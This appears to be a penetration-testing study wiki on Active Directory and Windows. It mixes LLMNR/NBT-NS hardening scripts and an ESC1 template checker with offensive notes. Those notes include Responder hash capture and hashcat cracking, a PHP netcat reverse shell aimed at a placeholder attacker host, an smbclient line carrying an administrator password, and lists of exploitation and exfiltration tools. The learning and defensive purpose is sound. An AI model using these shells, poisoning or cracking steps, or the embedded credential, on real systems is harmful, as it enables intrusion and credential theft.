home
Please note:

> [!IMPORTANT]
> This is a public wiki.

Callout types used on this wiki:

> [!NOTE]
> Useful information that users should know, even when skimming content.

> [!TIP]
> Helpful advice for doing things better or more easily.

> [!IMPORTANT]
> Key information users need to know to achieve their goal.

> [!WARNING]
> Urgent info that needs immediate user attention to avoid problems.

> [!CAUTION]
> Advises about risks or negative outcomes of certain actions.
> [!NOTE]
> This wiki covers a range of technical topics: penetration testing, Windows, Active Directory and PowerShell.
Code is available from the code repo https://github.com/asktechsupport/help
Step 1️⃣ Run Responder on the interface facing the target network (here tun0). Either invoke the script directly or use the responder command packaged on Kali:
python /usr/share/responder/Responder.py -I tun0 -rdw -v
sudo responder -I tun0 -dwP
Step 2️⃣

Step 3️⃣ A NetNTLMv2 hash will come through, like the screenshot:
Step 4️⃣ Using hashcat, if the password is weak enough we can crack it (mode 5600 is NetNTLMv2, which is what Responder captures from current Windows hosts; save the captured line to hashes.txt first):
hashcat -m 5600 hashes.txt rockyou.txt
To mitigate LLMNR (Link-Local Multicast Name Resolution) poisoning in an Active Directory environment, disable LLMNR on every Windows host. The registry steps below apply to a single machine; the Group Policy steps push the same setting across the domain.
Steps to Mitigate LLMNR Poisoning
- Check the current status of LLMNR
LLMNR is controlled by the EnableMulticast value under the DNS client policy key, not by an adapter binding (ms_lltdio is the Link-Layer Topology Discovery Mapper I/O driver and says nothing about LLMNR). Query the policy value with:
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Name "EnableMulticast" -ErrorAction SilentlyContinue
If the command returns nothing, no policy is set and LLMNR is enabled (the Windows default). If EnableMulticast is anything other than 0, LLMNR is also enabled. In either case, proceed to disable it.
- Disable LLMNR locally via the registry
For more than a handful of machines, apply the setting via Group Policy (below). On a single host, set the registry value directly. The policy key does not exist until a policy has been applied, so Set-ItemProperty alone fails on a fresh machine; create the key first, then write the value (New-ItemProperty -Force both creates the value and overwrites an existing one, so this is safe to re-run):
# Create the policy key if it is missing, then set EnableMulticast = 0 to disable LLMNR
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Force | Out-Null
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Name "EnableMulticast" -PropertyType DWord -Value 0 -Force
- Confirm the setting
Verify that LLMNR is disabled (EnableMulticast should read 0):
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Name "EnableMulticast"
- Deploy via Group Policy (for multiple machines)
  - Open the Group Policy Management Console (GPMC).
  - Navigate to Computer Configuration > Administrative Templates > Network > DNS Client.
  - Enable the setting "Turn off multicast name resolution".
Alternatively, use the GroupPolicy PowerShell module (installed with RSAT) to create and link the GPO. It writes the same registry value the administrative template sets:

> [!NOTE]
> Add the link to the powershell document.

# Create a new GPO
New-GPO -Name "Disable LLMNR"
# Configure the GPO to disable LLMNR
Set-GPRegistryValue -Name "Disable LLMNR" -Key "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -ValueName "EnableMulticast" -Type DWord -Value 0
# Link the GPO to the Organizational Unit (OU) that holds the computers (replace Computers and YourDomain with your own OU and domain)
New-GPLink -Name "Disable LLMNR" -Target "OU=Computers,DC=YourDomain,DC=co,DC=uk"
- Test and validate
After the policy has applied (run gpupdate /force on a client, or wait for the normal refresh interval), check that the registry value reads 0 and that no LLMNR traffic is seen. LLMNR is multicast, not broadcast: capture on the segment with Wireshark using the display filter llmnr (UDP port 5355, destination 224.0.0.252 or ff02::1:3) and confirm that no queries are still being sent.
Disabling LLMNR removes one of the name-resolution protocols Responder poisons. Responder also poisons NBT-NS (UDP 137) and mDNS (UDP 5353), so disable NetBIOS over TCP/IP on each adapter as well; otherwise hosts that fall back to NBT-NS still hand over their credentials.
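The local-machine part of the procedure above as one script, added here as an example rather than code from the original wiki. It reads the current LLMNR state, creates the policy key if it is missing, sets the value, disables NetBIOS over TCP/IP on every interface too (Responder poisons NBT-NS as well), and re-reads the state. It assumes an elevated PowerShell session on the host being hardened; the tshark command at the end is a suggestion for verifying from a second host and is not run by the script.

```powershell
# Added example for the LLMNR mitigation steps above; run in an elevated PowerShell session.
# Assumption: this hardens the local host only. Fleet-wide, use New-GPO / Set-GPRegistryValue.

$LlmnrKey   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
$NetBtIfKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'

function Get-LlmnrState {
    # EnableMulticast = 0 under the policy key turns LLMNR off. No key or no value means
    # "not configured", and the Windows default is LLMNR on.
    $item = Get-ItemProperty -Path $LlmnrKey -Name EnableMulticast -ErrorAction SilentlyContinue
    if ($null -eq $item)             { return 'Enabled (not configured)' }
    if ($item.EnableMulticast -eq 0) { return 'Disabled' }
    return 'Enabled'
}

function Disable-Llmnr {
    # New-Item -Force creates the key and any missing parents and is a no-op if it exists.
    # New-ItemProperty -Force creates the value or overwrites it, so this is safe to re-run.
    New-Item -Path $LlmnrKey -Force | Out-Null
    New-ItemProperty -Path $LlmnrKey -Name EnableMulticast -PropertyType DWord -Value 0 -Force | Out-Null
}

function Disable-NetBiosOverTcpIp {
    # Responder also poisons NBT-NS (UDP 137). Each interface has a NetbiosOptions value under
    # the NetBT Interfaces key: 0 = take the setting from DHCP, 1 = enabled, 2 = disabled.
    # The change takes effect when the interface is reset or at the next reboot.
    Get-ChildItem -Path $NetBtIfKey | ForEach-Object {
        Set-ItemProperty -Path $_.PSPath -Name NetbiosOptions -Value 2 -Type DWord
    }
}

function Get-NetBiosState {
    # Per-interface NetbiosOptions so the NBT-NS change can be confirmed alongside LLMNR.
    Get-ChildItem -Path $NetBtIfKey | ForEach-Object {
        [pscustomobject]@{
            Interface      = $_.PSChildName
            NetbiosOptions = (Get-ItemProperty -Path $_.PSPath -Name NetbiosOptions).NetbiosOptions
        }
    }
}

Write-Output "LLMNR before: $(Get-LlmnrState)"
Disable-Llmnr
Disable-NetBiosOverTcpIp
Write-Output "LLMNR after:  $(Get-LlmnrState)"
Get-NetBiosState | Format-Table -AutoSize

# Verify on the wire from a second host on the same segment. LLMNR is multicast on UDP 5355
# (224.0.0.252 / ff02::1:3); NBT-NS is broadcast on UDP 137. After a reboot, nothing from the
# hardened host should match:
#   tshark -i eth0 -f "udp port 5355 or udp port 137"
```

Run it once before and once after a reboot: the LLMNR change is immediate, but the NetbiosOptions value is only read when the interface initialises, so the wire check is only meaningful after the restart.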
> [!TIP]
> If a company must use or cannot disable LLMNR, the best course of action is to:
> 1️⃣ Require Network Access Control
> 2️⃣ Require strong user passwords (greater than 14 characters), so that captured NetNTLMv2 hashes do not crack in practice
> [!NOTE]
> Active Directory enumeration and auditing tools:
> - ldapdomaindump
> - BloodHound
> - PlumHound
> - PingCastle
- Overview of Penetration Testing
- Definition and Goals
- Types of Penetration Tests (Black Box, White Box, Gray Box)
- Legal and Ethical Considerations
- Laws and Compliance (e.g., GDPR, HIPAA, PCI-DSS)
- Rules of Engagement (ROE)
- Obtaining Permission (Authorization)
- Planning and Pre-Engagement
- Scoping and Requirements
- Threat Modeling
- Attack Surface Analysis
- Reconnaissance
- Passive Reconnaissance
- Active Reconnaissance
- OSINT Tools and Techniques
- Scanning and Enumeration
- Network Mapping
- Service Enumeration
- Vulnerability Scanning
- Exploitation
- Gaining Access
- Privilege Escalation
- Tools for Exploitation
- Post-Exploitation
- Persistence
- Lateral Movement
- Data Exfiltration
- Reporting
- Writing a Professional Report
- Mitigation Recommendations
- OSINT Tools
- Maltego
- theHarvester
- SpiderFoot
- Shodan
- Subdomain Enumeration
- Amass
- Sublist3r
- Google Dorking
- Advanced Search Operators
- WHOIS and DNS Recon
- dnsenum
- DNSRecon
Windows privilege check: whoami /priv (lists the privileges held by the current token, the first thing to look at before privilege escalation)
- Network Scanning
- Nmap
- Masscan
- Web Application Scanning
- Nikto
- Burp Suite
- Service Enumeration
- smbclient
- enum4linux
- rpcclient
> [!NOTE]
> To query the state of the Windows Defender service, use (type sc.exe rather than sc: in PowerShell, sc is an alias for Set-Content and the query is silently misinterpreted):
sc.exe query windefend
> [!NOTE]
> To find out what AV is running, list every installed service and look for security-vendor names in the output:
sc.exe queryex type= service
> [!NOTE]
> To query the firewall, use the commands below. The netsh firewall context is the deprecated pre-Vista one and may be missing on current builds; netsh advfirewall show allprofiles is its replacement:
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
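The three sc/netsh checks above, added here as a PowerShell equivalent that is not from the original wiki. It uses only built-in cmdlets (Get-Service, Get-MpComputerStatus, Get-CimInstance against root/SecurityCenter2, Get-NetFirewallProfile) and returns objects rather than text you have to read by eye. The vendor-keyword pattern in Get-AVLikeServices is my own list and an assumption, not an exhaustive one.

```powershell
# Added example: PowerShell versions of the sc.exe / netsh checks in the notes above.
# Built-in cmdlets only; a standard user can run all of it.

function Get-DefenderState {
    # Same fact as 'sc.exe query windefend': is the Defender service present and running,
    # plus the real-time protection state if the Defender module is installed.
    $svc = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
    $status = 'not installed'
    if ($svc) { $status = $svc.Status }

    $rtp = 'unknown'; $av = 'unknown'
    # Get-MpComputerStatus exists only where the Defender PowerShell module is present.
    if (Get-Command Get-MpComputerStatus -ErrorAction SilentlyContinue) {
        $mp = Get-MpComputerStatus -ErrorAction SilentlyContinue
        if ($mp) { $rtp = $mp.RealTimeProtectionEnabled; $av = $mp.AntivirusEnabled }
    }
    [pscustomobject]@{
        Service            = 'WinDefend'
        Status             = $status
        RealTimeProtection = $rtp
        AntivirusEnabled   = $av
    }
}

function Get-RegisteredAVProducts {
    # Security Center (root/SecurityCenter2) lists every AV product that registered with it,
    # third-party ones included. The namespace does not exist on Windows Server SKUs, so the
    # result is empty there and Get-AVLikeServices is the fallback.
    Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct -ErrorAction SilentlyContinue |
        Select-Object displayName, productState, pathToSignedProductExe
}

function Get-AVLikeServices {
    # What you would do by eye over 'sc.exe queryex type= service': match service names
    # against vendor keywords. The keyword list is an assumption; extend it for your estate.
    $pattern = 'defend|antivirus|antimalware|endpoint|crowdstrike|csagent|sentinel|carbon|cylance|mcafee|symantec|sophos|trend|kaspersky|eset|cortex|cybereason|elastic'
    Get-Service | Where-Object { $_.Name -match $pattern -or $_.DisplayName -match $pattern } |
        Select-Object Name, DisplayName, Status
}

function Get-FirewallState {
    # Replacement for the deprecated 'netsh firewall show state': per-profile state and defaults.
    Get-NetFirewallProfile |
        Select-Object Name, Enabled, DefaultInboundAction, DefaultOutboundAction, LogFileName
}

Get-DefenderState        | Format-List
Get-RegisteredAVProducts | Format-Table -AutoSize
Get-AVLikeServices       | Format-Table -AutoSize
Get-FirewallState        | Format-Table -AutoSize
```

On a workstation the Security Center query is the authoritative answer; on a server it returns nothing, which is why the service-name match is kept as a second opinion rather than dropped.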
- Exploitation Frameworks
- Metasploit
- Cobalt Strike
- Core Impact
- Vulnerability-Specific Exploits
- SQLmap (SQL Injection)
- Hydra (Brute Forcing)
- Aircrack-ng (Wi-Fi Hacking)
- Scripting Exploits
- Python and Bash Exploits
- Custom Scripts for Exploitation
- Privilege Escalation
- Windows Tools: WinPEAS, Mimikatz, PowerUp
- Linux Tools: LinPEAS, GTFOBins
- Persistence Mechanisms
- Scheduled Tasks
- Startup Scripts
- Lateral Movement
- PsExec
- BloodHound
- Data Exfiltration
- Netcat
- Exfiltration Over DNS
- OWASP Top 10
- Common Web Vulnerabilities
- SQL Injection
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)
- Insecure Deserialization
- Web Security Tools
- Burp Suite
- OWASP ZAP
- Wappalyzer
- Wireless Attacks
- WPA/WPA2 Cracking
- Evil Twin Attacks
- Wireless Tools
- Aircrack-ng Suite
- Wireshark
- Bettercap
- Techniques
- Phishing
- Vishing
- Pretexting
- Tools
- Gophish
- SET (Social Engineering Toolkit)
- Reporting Structure
- Executive Summary
- Technical Details
- Proof of Concepts
- Risk Ratings
- CVSS (Common Vulnerability Scoring System)
- Mitigation Strategies
- Best Practices for Hardening
- Windows Subsystem for Linux (WSL)
- PayloadsAllTheThings
- Chatterbox
- SecNotes
- Reconnaissance Tools
- theHarvester, Shodan, SpiderFoot
- Scanning Tools
- Nmap, Nikto, Masscan
- Exploitation Tools
- Metasploit, SQLmap, Hydra
- Post-Exploitation Tools
- Mimikatz, LinPEAS, BloodHound
- Reporting Tools
- Dradis Framework
smbclient -U 'administrator%u6!4zwgwOM#^0Bf#Nwhn' '//127.0.0.1/c$'
This is a basic reverse shell written in PHP. PHP does not expand variables inside single quotes, so the original $yourip would have been passed to nc literally; build the command in double quotes instead. It relies on nc.exe being present on the (Windows) target and on a listener waiting on the attacking machine (nc -lvnp 4444):
<?php
// Replace ATTACKER_IP with the address of the listening host (placeholder, not a real value)
$ip = 'ATTACKER_IP';
system("nc.exe -e cmd.exe $ip 4444");
?>
Impacket example scripts for remote command execution over SMB/WMI:
- psexec.py
- smbexec.py
- wmiexec.py
Spawning a TTY Shell - https://netsec.ws/?p=337
Impacket (the project behind psexec.py, smbexec.py and wmiexec.py): https://github.com/SecureAuthCorp/impacket.git
cd /opt/
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket/
pip3 install .
> [!NOTE]
> git clone checks out into a directory named impacket. A release tarball unpacks into a versioned directory instead (impacket-0.9.19 at the time this was written), so adjust the cd line to match whichever you used. The repository has since moved to the fortra organisation on GitHub; the old URL redirects.
Nmap
arp-scan
TCP connect scan, the default for an unprivileged user (full three-way handshake: SYN, SYN/ACK, ACK): nmap -sT
Stealth or half-open scan (SYN, SYN/ACK, then RST instead of completing the handshake; needs root/raw sockets): nmap -sS
All 65535 TCP ports with OS and version detection (-p- is lowercase; -P- is not a valid option): nmap -T4 -p- -A <target>
https://blog.reknowledge.tech/blog/osnt-analyst-replaced-by-automation
The intelligence cycle: PLANNING & DIRECTION >> COLLECTION >> PROCESSING AND EXPLOITATION >> ANALYSIS AND PRODUCTION >> DISSEMINATION AND INTEGRATION
- Google, lmgtfy
  - site:
  - site:tesla.com -www
  - filetype:csv
- hunter.io
- Phonebook.cz
- Clearbit
- email-checker.net
- emailhippo.com
- hashes.org
- sublist3r
- owasp amass
- wappalyzer (Firefox)
- burpsuite https://burp - Kali
- breach-parse (hmaverickadams, github.com)
- Recommended Courses
- TCM Academy (PNPT, OSINT, Practical Ethical Hacking)
- Practice Labs
- TryHackMe
- Hack The Box
- VulnHub
- Books
- "The Hacker Playbook"
- "Red Team Field Manual"
- "Metasploit: The Penetration Tester’s Guide"
- https://github.com/swisskyrepo/PayloadsAllTheThings
Links to further reading and tools.
Answers to commonly asked questions.
How to configure and manage Group Policies.
Hosts file
c:\Windows\System32\Drivers\etc\hosts
Key concepts and architecture of Active Directory.
Guide to resolving frequently encountered problems.
Best practices for managing users and groups.
Securing your environment and managing permissions.
Preparing for and recovering from disasters.
Key functions of AD CS
- Integration with Active Directory: AD CS is Microsoft's PKI implementation for Active Directory. It issues X.509 certificates used for encryption, message signing and authentication, and stores its templates and CA configuration in the directory.
- Certificate Authority (CA): certificates are issued by a CA. The CA binds an identity to a public/private key pair, which applications then use to verify that identity.
- Private/public key generation: the client generates a public/private key pair. The private key stays on the client; the public key goes into a Certificate Signing Request (CSR) along with details such as the subject and the template name.
- Certificate Signing Request (CSR): the CSR, containing the public key and the other details needed to build the certificate, is sent to the Enterprise CA.
- Verification by the CA: the Enterprise CA checks the requester's enrollment permissions and the template settings, and proceeds only if the client is permitted to request a certificate from that template.
- Certificate generation: if the request is permitted, the CA builds a certificate from the template settings and signs it with the CA's private key.
- Certificate issuance: the signed certificate is returned to the client, which can now use it for secure communications, authentication and other cryptographic operations.
- Object identifiers (OIDs): PKI Solutions provides a comprehensive list of the EKU OIDs used by Microsoft.
- ESC1 attacks: a template that lets the enrollee supply the subject name, has an EKU permitting client authentication, needs no manager approval and is enrollable by low-privileged users lets an attacker request a certificate for any account (a domain admin, say) and then authenticate as it. Read up on ESC1 and use the Certipy tool to find and exploit it.
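An added example, not from the original wiki or from the Certipy project, that checks certificate-template attributes for the ESC1 combination just described: enrollee supplies the subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in msPKI-Certificate-Name-Flag), an EKU that permits client authentication (or no EKU at all) in pKIExtendedKeyUsage, and no manager approval (CT_FLAG_PEND_ALL_REQUESTS in msPKI-Enrollment-Flag). The sample templates are constructed for the demo and do not come from a real domain; the live Get-ADObject query in the trailing comment assumes the ActiveDirectory RSAT module. The fourth ESC1 condition, enrollment rights for a low-privileged principal, lives in the template's security descriptor and is not parsed here.

```powershell
# Added example: flag certificate templates with the ESC1 attribute pattern.
# Bits and OIDs below are the documented Microsoft values; the sample templates are constructed.

$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # in msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x2   # in msPKI-Enrollment-Flag: CA manager must approve
$ClientAuthOids = @(
    '1.3.6.1.5.5.7.3.2',       # Client Authentication
    '1.3.6.1.5.2.3.4',         # PKINIT Client Authentication
    '1.3.6.1.4.1.311.20.2.2',  # Smart Card Logon
    '2.5.29.37.0'              # Any Purpose
)

function Test-Esc1Template {
    param(
        [Parameter(Mandatory)] [string] $Name,
        [Parameter(Mandatory)] [int]    $NameFlag,        # msPKI-Certificate-Name-Flag
        [Parameter(Mandatory)] [int]    $EnrollmentFlag,  # msPKI-Enrollment-Flag
        [string[]] $Eku = @()                              # pKIExtendedKeyUsage; empty = no EKU = usable for anything
    )
    $suppliesSubject  = ($NameFlag -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
    $managerApproval  = ($EnrollmentFlag -band $CT_FLAG_PEND_ALL_REQUESTS) -ne 0
    $allowsClientAuth = ($Eku.Count -eq 0) -or
                        (@($Eku | Where-Object { $ClientAuthOids -contains $_ }).Count -gt 0)
    [pscustomobject]@{
        Template        = $Name
        SuppliesSubject = $suppliesSubject
        ClientAuth      = $allowsClientAuth
        ManagerApproval = $managerApproval
        Esc1Candidate   = $suppliesSubject -and $allowsClientAuth -and -not $managerApproval
    }
}

# Constructed sample templates (not from a real domain) to show the logic offline.
$samples = @(
    @{ Name = 'User';         NameFlag = 0x0; EnrollmentFlag = 0x29; Eku = @('1.3.6.1.5.5.7.3.2', '1.3.6.1.5.5.7.3.4') }
    @{ Name = 'VulnTemplate'; NameFlag = 0x1; EnrollmentFlag = 0x0;  Eku = @('1.3.6.1.5.5.7.3.2') }
    @{ Name = 'ApprovedOnly'; NameFlag = 0x1; EnrollmentFlag = 0x2;  Eku = @('1.3.6.1.5.5.7.3.2') }
    @{ Name = 'WebServer';    NameFlag = 0x1; EnrollmentFlag = 0x0;  Eku = @('1.3.6.1.5.5.7.3.1') }
    @{ Name = 'NoEku';        NameFlag = 0x1; EnrollmentFlag = 0x0;  Eku = @() }
)
$samples | ForEach-Object { $t = $_; Test-Esc1Template @t } | Format-Table -AutoSize
# Expected: VulnTemplate and NoEku are Esc1Candidate. 'User' has a CA-built subject,
# 'ApprovedOnly' needs manager approval, 'WebServer' only carries the Server Authentication EKU.

# Live query (assumes the ActiveDirectory module). Templates live in the Configuration partition,
# which every domain user can read, so this works from any domain-joined host:
#   $cfg = (Get-ADRootDSE).configurationNamingContext
#   Get-ADObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,$cfg" `
#       -LDAPFilter '(objectClass=pKICertificateTemplate)' `
#       -Properties msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, pKIExtendedKeyUsage |
#     ForEach-Object {
#         Test-Esc1Template -Name $_.Name -NameFlag $_.'msPKI-Certificate-Name-Flag' `
#             -EnrollmentFlag $_.'msPKI-Enrollment-Flag' -Eku @($_.pKIExtendedKeyUsage)
#     } | Where-Object Esc1Candidate
```

A template flagged here is only exploitable if it is also published on a CA and a low-privileged principal holds Enroll rights on it, so treat the output as a shortlist to check in the template's security tab (or with Certipy), not as a finding on its own.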
AD Components
- Domain Controllers
- AD DS Data Store
  - NTDS.dit
- Forests, Trees, Trusts
  - Trusts: directional, transitive
- Organisational Units (OUs)
- Schema
  - Class Objects
  - Attribute Objects
- User objects: enable network resource access for a user
- InetOrgPerson: similar to a user account; used for compatibility with other directory services
- Contacts: used primarily to assign e-mail addresses to external users; do not enable network access
- Groups: used to simplify the administration of access control
- Computers: enable authentication and auditing of computer access to resources
- Printers: used to simplify the process of locating and connecting to printers
- Shared folders: enable users to search for shared folders based on properties
- Certificates: a certificate on a server is like an ID card for a website. It shows that the website is legitimate and helps ensure that your information is safe when you visit it. When you go to a website, the certificate lets your browser confirm it is talking to the real site and not an imposter, and it supports the encryption of any data you share, such as passwords or card numbers, so that only the website can read it. In short, it is a way to build trust and keep your online activities secure.
